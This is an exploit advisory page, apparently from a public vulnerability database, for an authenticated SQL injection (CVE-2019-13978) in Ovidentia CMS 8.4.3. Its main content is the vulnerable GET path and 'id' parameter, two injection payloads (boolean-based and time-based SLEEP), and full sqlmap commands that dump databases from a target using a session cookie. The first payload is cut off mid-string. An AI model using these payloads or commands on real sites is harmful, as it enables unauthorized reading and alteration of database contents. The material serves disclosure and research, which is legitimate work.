Ovidentia 8.4.3 SQL Injection

2019.07.25
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#------------------------------------------------------- # Exploit Title: [ Ovidentia CMS - SQL Injection (Authenticated) ] # Date: [ 06/05/2019 ] # CVE: [ CVE-2019-13978 ] # Exploit Author: # [ Fernando Pinheiro (n3k00n3) ] # [ Victor Fl ores (UserX) ] # Vendor Homepage: [ https://www.ovidentia.org/ ] # Version: [ 8.4.3 ] # Tested on: [ Mac,linux - Firefox, safari ] # Download [ http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893 ] # # [ Kitsun3Sec Research Group ] #-------------------------------------------------------- POC Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1 Type: GET Vulnerable Field: id Payload: 1. tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT 2. tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg) URL: https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1 Using Request file sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs Using Get ./sqlmap.py -u [http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1](http://target/ovidentia/index.php/?tg\=delegat\&idx\=mem\&id\=1) --cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top